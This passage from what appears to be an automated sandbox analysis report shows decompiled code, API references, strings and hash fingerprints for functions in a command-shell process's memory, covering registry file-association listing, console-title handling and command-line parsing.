								_t95 = _t99 >> 1;
								if(_t99 == 0) {
									goto L51;
								}
								_push(_t81);
								_push(_t119);
								E001C25D9(L"%s=%s\r\n");
								goto L52;
							}
							E001BC5A2( &_v528, 0x400023a5, 1, _t119);
							goto L53;
						}
						_push(1);
						_push(0x400023db);
						E001BC5A2(_t92);
						E001C0040(_t119);
						_t42 = 0x7b;
						goto L55;
					}
					E001BC5A2(__ecx, 0x400023a5, 1, __edx);
					_t42 = 0x7b;
					goto L55;
				}
				_t120 = 0;
				_v540 = 0x104;
				_v536 = 0;
				_t64 = RegEnumKeyExW(__ecx, 0,  &_v528,  &_v540, 0, 0, 0, 0);
				if(_t64 != 0) {
					L32:
					_t28 = _t64 - 0x103; // -259
					asm("sbb esi, esi");
					_t120 =  ~_t28 & _t64;
					goto L54;
				}
				do {
					if(_v528 == 0x2e) {
						L30:
						if( *0x1dd544 != 0) {
							goto L34;
						}
						goto L31;
					}
					_t123 =  &_v528;
					_t9 = _t123 + 2; // 0x30
					_t102 = _t9;
					do {
						_t67 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t67 != 0);
					_t125 = _t123 - _t102 >> 1;
					_t10 = _t125 + 0x14; // 0x40
					if(_t10 > 0x104) {
						L29:
						_t120 = _v536;
						goto L30;
					}
					_t116 = 0x104;
					_t69 =  &_v528;
					while( *_t69 != 0) {
						_t69 = _t69 + 2;
						_t116 = _t116 - 1;
						if(_t116 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t105 =  ~_t116 & 0x00000104 - _t116;
					if(_t116 == 0) {
						L22:
						_t113 =  &_v528;
						_t106 = _t81;
						_t72 = E001D5662(_t81, _t81,  &_v528, _t119, _t125, 0);
						_t120 = _t125 + _t125;
						_t119 = _t72;
						if(_t120 >= 0x208) {
							E001C711D(_t72, _t81, _t106,  &_v528, _t119, _t120);
							goto L34;
						}
						 *((short*)(_t126 + _t120 - 0x20c)) = 0;
						if(_t119 == 0) {
							L28:
							E001C0040(_t119);
							goto L29;
						}
						_t108 = _t119;
						_t21 = _t108 + 2; // 0x2
						_t113 = _t21;
						do {
							_t76 =  *_t108;
							_t108 = _t108 + 2;
						} while (_t76 != 0);
						if(_t108 != _t113) {
							_push(_t119);
							_push( &_v528);
							E001C25D9(L"%s=%s\r\n");
							_t127 = _t127 + 0xc;
						}
						goto L28;
					}
					_t80 =  &(( &_v528)[_t105]);
					_t118 = 0x104 - _t105;
					if(0x104 == 0) {
						L19:
						_t80 = _t80 - 2;
						L21:
						 *_t80 = 0;
						goto L22;
					}
					_t112 = 0x7ffffffe;
					_t83 = L"\\Shell\\Open\\Command" - _t80;
					while(_t112 != 0) {
						_t119 =  *(_t83 + _t80) & 0x0000ffff;
						if(_t119 == 0) {
							break;
						}
						 *_t80 = _t119;
						_t112 = _t112 - 1;
						_t80 =  &(_t80[1]);
						_t118 = _t118 - 1;
						if(_t118 != 0) {
							continue;
						}
						L18:
						_t81 = _v532;
						goto L19;
					}
					__eflags = _t118;
					if(__eflags != 0) {
						_t81 = _v532;
						goto L21;
					}
					goto L18;
					L31:
					_v540 = 0x104;
					_t120 = _t120 + 1;
					_v536 = _t120;
					_t64 = RegEnumKeyExW(_t81, _t120,  &_v528,  &_v540, 0, 0, 0, 0);
				} while (_t64 == 0);
				goto L32;
			}

0x001d4cf0
0x001d4cfb
0x001d4d02
0x001d4d06
0x001d4d08
0x001d4d12
0x001d4ec8
0x001d4ecc
0x001d4ef6
0x001d4ef8
0x001d4efa
0x001d4ebe
0x001d4ebe
0x001d5000
0x001d5010
0x001d5010
0x001d4f03
0x001d4f08
0x001d4f0a
0x001d4f0c
0x001d4f0e
0x001d4f0e
0x001d4f11
0x001d4f13
0x001d4f13
0x001d4f16
0x001d4f16
0x001d4f19
0x001d4f1c
0x001d4f1c
0x001d4f23
0x001d4f25
0x001d4f26
0x001d4f29
0x001d4f2e
0x001d4f5b
0x001d4f65
0x001d4f70
0x001d4f91
0x001d4f93
0x001d4f95
0x001d4fa9
0x001d4faf
0x001d4fb6
0x001d4fb8
0x001d4fba
0x001d4fe0
0x001d4fe8
0x001d4fed
0x001d4ff2
0x001d4ff7
0x001d4ff9
0x001d4ffe
0x001d4ffe
0x00000000
0x001d4ffe
0x001d4fbc
0x001d4fbe
0x001d4fbe
0x001d4fc1
0x001d4fc1
0x001d4fc4
0x001d4fc7
0x001d4fc7
0x001d4fcc
0x001d4fcc
0x001d4fce
0x001d4fd0
0x00000000
0x00000000
0x001d4fd2
0x001d4fd3
0x001d4fd9
0x00000000
0x001d4fd9
0x001d4f9f
0x00000000
0x001d4fa4
0x001d4f30
0x001d4f32
0x001d4f37
0x001d4f41
0x001d4f46
0x00000000
0x001d4f46
0x001d4ed6
0x001d4ede
0x00000000
0x001d4ede
0x001d4d18
0x001d4d1a
0x001d4d2e
0x001d4d3e
0x001d4d46
0x001d4ea8
0x001d4ea8
0x001d4eb0
0x001d4eb2
0x00000000
0x001d4eb2
0x001d4d50
0x001d4d58
0x001d4e68
0x001d4e6f
0x00000000
0x00000000
0x00000000
0x001d4e6f
0x001d4d5e
0x001d4d64
0x001d4d64
0x001d4d67
0x001d4d67
0x001d4d6a
0x001d4d6d
0x001d4d74
0x001d4d76
0x001d4d7e
0x001d4e62
0x001d4e62
0x00000000
0x001d4e62
0x001d4d84
0x001d4d89
0x001d4d90
0x001d4d96
0x001d4d99
0x001d4d9c
0x00000000
0x00000000
0x00000000
0x001d4d9c
0x001d4da9
0x001d4dab
0x001d4daf
0x001d4e05
0x001d4e05
0x001d4e0b
0x001d4e0d
0x001d4e12
0x001d4e14
0x001d4e1c
0x001d4eb9
0x00000000
0x001d4eb9
0x001d4e24
0x001d4e2e
0x001d4e5b
0x001d4e5d
0x00000000
0x001d4e5d
0x001d4e30
0x001d4e32
0x001d4e32
0x001d4e35
0x001d4e35
0x001d4e38
0x001d4e3b
0x001d4e44
0x001d4e46
0x001d4e4d
0x001d4e53
0x001d4e58
0x001d4e58
0x00000000
0x001d4e44
0x001d4dbc
0x001d4dbf
0x001d4dc1
0x001d4df5
0x001d4df5
0x001d4e00
0x001d4e02
0x00000000
0x001d4e02
0x001d4dc8
0x001d4dcd
0x001d4dd0
0x001d4dd4
0x001d4ddb
0x00000000
0x00000000
0x001d4ddd
0x001d4de0
0x001d4de1
0x001d4de4
0x001d4de7
0x00000000
0x00000000
0x001d4def
0x001d4def
0x00000000
0x001d4def
0x001d4deb
0x001d4ded
0x001d4dfa
0x00000000
0x001d4dfa
0x00000000
0x001d4e71
0x001d4e7f
0x001d4e90
0x001d4e94
0x001d4e9a
0x001d4ea0
0x00000000

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 001D4D3E
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 001D4E9A
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 001D4F8B

Strings

., xrefs: 001D4D50
\Shell\Open\Command, xrefs: 001D4DC3, 001D4F60
%s=%s, xrefs: 001D4E4E, 001D4FD4

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Enum$Open
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 2886760741-1459555574
Opcode ID: fd325cbad77662f40847fccc2d5e9b63eedd074e5f0d378ed221a837227102ed
Instruction ID: 5b1eac990839345d586bd76a4f858d544cd6e9c699bc7a787af8bdc218844c76
Opcode Fuzzy Hash: fd325cbad77662f40847fccc2d5e9b63eedd074e5f0d378ed221a837227102ed
Instruction Fuzzy Hash: 91812975A0021497DB349B28DC95BFB336AEFA4700F1542AEF81A97381EB74DE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BB2B0 Relevance: 10.7, APIs: 7, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001BB2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0x1dd0b4; // 0xea614d48
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E001BB42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0x1dd59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E001BC5A2(_t65);
								goto L20;
							} else {
								L20:
								return E001C6FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E001C0040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E001BDEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E001BB3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E001C00B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E001C1040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E001C18C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E001C18C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}

0x001bb2b0
0x001bb2bb
0x001bb2c2
0x001bb2c6
0x001bb2c9
0x001bb2d2
0x001bb2d9
0x001bb2df
0x001bb2e5
0x001bb2ec
0x001d1346
0x001d134c
0x001d134e
0x001d142c
0x001d142e
0x001bb3a0
0x001bb3a2
0x001bb3a5
0x001bb3ab
0x001bb3ab
0x001bb3b1
0x001bb3b3
0x001bb3bb
0x001bb3c8
0x001bb3c8
0x001bb3d0
0x001bb3d3
0x001bb3d3
0x001bb3db
0x001d138b
0x001d138d
0x001d138e
0x001d1390
0x00000000
0x001bb3e1
0x001bb3e1
0x001bb3f3
0x001bb3f3
0x001bb3db
0x001bb3bd
0x001bb3bf
0x001bb3c1
0x001bb3c3
0x001bb3c3
0x00000000
0x001bb3bf
0x001d1354
0x001d135c
0x001d1360
0x00000000
0x00000000
0x001d1366
0x001d1368
0x001d136a
0x001d136a
0x001d136d
0x001d136d
0x001d1370
0x001d1373
0x001d137a
0x001d1382
0x00000000
0x00000000
0x001d138a
0x00000000
0x001d138a
0x001bb2f2
0x001bb2fb
0x001d139c
0x001d139c
0x001bb303
0x00000000
0x001bb309
0x001bb309
0x001bb30a
0x001bb30c
0x001bb317
0x001bb31d
0x001bb322
0x001bb328
0x001bb32b
0x00000000
0x001bb331
0x001bb331
0x001bb333
0x001bb335
0x001bb335
0x001bb338
0x001bb338
0x001bb33b
0x001bb33e
0x001bb345
0x001bb34d
0x00000000
0x00000000
0x001bb34f
0x001bb359
0x001bb35b
0x001bb363
0x00000000
0x00000000
0x001bb36b
0x001bb370
0x001bb372
0x001bb377
0x001bb37f
0x001d13a4
0x001d13b0
0x001d13be
0x00000000
0x00000000
0x001d13db
0x001d140d
0x001d1413
0x001d1418
0x001d1421
0x00000000
0x00000000
0x001bb39e
0x001bb39e
0x00000000
0x001bb39e
0x001d13dd
0x001d13e3
0x001d13e9
0x001d13eb
0x001d13eb
0x001d13f7
0x001d13fb
0x001d1401
0x001d1407
0x00000000
0x001d1407
0x001bb389
0x001bb3f6
0x001bb3f8
0x00000000
0x001bb3f8
0x001bb38e
0x001bb393
0x001bb39c
0x00000000
0x00000000
0x00000000
0x001bb39c
0x001bb32b

APIs

Part of subcall function 001BB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 001BB448
Part of subcall function 001BB42E: NtOpenProcessToken.NTDLL ref: 001BB460
Part of subcall function 001BB42E: NtClose.NTDLL(00000000), ref: 001BB4B1

SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 001BB3A5
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001BB3D3
RtlNtStatusToDosError.NTDLL ref: 001D133F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001D1346
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 001D13B6
wcsstr.MSVCRT ref: 001D13D1
wcsstr.MSVCRT ref: 001D13EF

Part of subcall function 001BB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,001D95EF,001C9564,00000001,?), ref: 001BB421

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
String ID:
API String ID: 1313749407-0
Opcode ID: 22f3f126423b644b56ede6827e0b1a0bb0b78a2a4bf6568bf4698a5b0923701b
Instruction ID: fdff5475ef7e6ed88972b8397b29405a72099416fd54561dc946091e2f5d615c
Opcode Fuzzy Hash: 22f3f126423b644b56ede6827e0b1a0bb0b78a2a4bf6568bf4698a5b0923701b
Instruction Fuzzy Hash: 9F51B335A44229ABDB249F759CD87EE73E4FF68310F1500AAE905D7A50EB70DE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BE9A0 Relevance: 10.6, APIs: 7, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001BE9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E001C00B0(0x50);
				if(_t114 == 0) {
					E001D9287(0x50);
					__imp__longjmp(0x1eb8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0x1efa8c +  *0x1efa8c;
					_t111 = E001C00B0( *0x1efa8c +  *0x1efa8c);
					if(_t111 == 0) {
						L91:
						E001D9287(_t121);
						__imp__longjmp(0x1eb8b8, 1);
						asm("int3");
						E001D9287(_t121);
						__imp__longjmp(0x1eb8b8, 1);
						E001D9287(_t121);
						__imp__longjmp(0x1eb8b8, 1);
						L94:
						while(1) {
							if(E001BD7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E001BD7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E001C0100(_t125, 4 + _t163 * 2) == 0) {
								E001D9287(_t125);
								__imp__longjmp(0x1eb8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E001C00B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E001C1040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0x1efaa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E001BEEC8() != 0) {
											if(E001BF030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0x1efa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E001C02B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E001BF300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E001D9287(_t128);
									__imp__longjmp(0x1eb8b8, 1);
									asm("int3");
									if( *0x1efa90 != 0) {
										E001D82EB(_t128);
									}
									 *0x1dd5c8 = 0;
									if( *0x1efa88 != 0) {
										E001D8121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E001C6FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0x1efa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0x1efaa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

0x001be9a4
0x001be9a6
0x001be9ab
0x001be9b1
0x001be9b5
0x001cc018
0x001cc024
0x00000000
0x001be9bb
0x001be9c0
0x001be9c2
0x001be9c9
0x001be9cc
0x001be9d3
0x001cc02a
0x001cc02a
0x001cc036
0x001cc03c
0x001cc03d
0x001cc049
0x001cc04f
0x001cc05b
0x00000000
0x001cc061
0x001cc06d
0x001beb5a
0x001beb5a
0x001beb66
0x001beb7e
0x001beb81
0x001beb84
0x001beb8b
0x001becf0
0x001becf0
0x001becf4
0x001becf6
0x001becf9
0x001becfc
0x001becff
0x001bed05
0x00000000
0x00000000
0x001bed0a
0x00000000
0x001bed10
0x001bed15
0x00000000
0x001bed17
0x00000000
0x001bed17
0x001bed15
0x00000000
0x001bed0a
0x001bed6e
0x001bed6e
0x001beb91
0x001beb91
0x001beb68
0x001beb6d
0x001beb73
0x001beb78
0x001beccd
0x001becd2
0x001bed23
0x001bed26
0x001bed69
0x001bed69
0x001bed28
0x001bed2e
0x001bed38
0x001becd4
0x001becd6
0x001cc092
0x001cc092
0x001becdc
0x001bece6
0x001bece6
0x00000000
0x00000000
0x00000000
0x001beb78
0x001beb9b
0x001beb9f
0x001beba2
0x001beba7
0x00000000
0x00000000
0x001cc073
0x001bec20
0x001bec20
0x001bec26
0x001bec28
0x001bec30
0x001bec37
0x001bec3d
0x001bec42
0x001bec8a
0x001bec91
0x001beca9
0x001becb0
0x001cc084
0x00000000
0x001cc08a
0x00000000
0x001cc08a
0x001becb6
0x001becb6
0x001becb6
0x001becba
0x001becbd
0x001becc2
0x00000000
0x00000000
0x001becc8
0x001becc2
0x001bec97
0x001bec9c
0x001beca2
0x001beca7
0x00000000
0x00000000
0x00000000
0x00000000
0x001beca7
0x001bec44
0x001bec4f
0x001bec55
0x001bec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x001bec5a
0x00000000
0x001bec42
0x001bec60
0x001bec6d
0x001bec78
0x001bec78
0x001bec7b
0x001bec85
0x001beb5a
0x001beb5a
0x001beb5a
0x001beb5a
0x00000000
0x001beb26
0x001beb26
0x001beb2d
0x001beb33
0x001beb38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001beb3e
0x001beb49
0x001beb4f
0x001beb52
0x001bebde
0x001bebe3
0x00000000
0x001bebe9
0x001bebe9
0x001bebe9
0x001bebec
0x001bebf2
0x00000000
0x00000000
0x00000000
0x00000000
0x001bebf2
0x00000000
0x001bed40
0x001bed40
0x00000000
0x001bebf8
0x001bebfd
0x001bec03
0x001bec06
0x001bec0e
0x001bec11
0x001bec14
0x001bec1a
0x00000000
0x00000000
0x00000000
0x00000000
0x001bec1a
0x001bec60
0x001bec26
0x001bebad
0x001bebad
0x001bebb5
0x001bebb7
0x001bebc5
0x001cc09a
0x001cc0a6
0x001cc0ac
0x001cc0ad
0x001cc0ad
0x001cc0ad
0x001cc0b0
0x001cc0b0
0x001cc0b3
0x001cc0b6
0x001cc0bf
0x001bedfa
0x001bedfa
0x001bedfa
0x001bee02
0x001bee04
0x001bee09
0x00000000
0x00000000
0x001bee0f
0x001bee14
0x001cc0cb
0x001cc0cb
0x001bee1a
0x001bee1e
0x001cc0d5
0x001cc0d5
0x001bee32
0x001cc0f0
0x001cc0f0
0x001bee38
0x001bee38
0x001bee3a
0x001bee3c
0x001bee40
0x001cc0eb
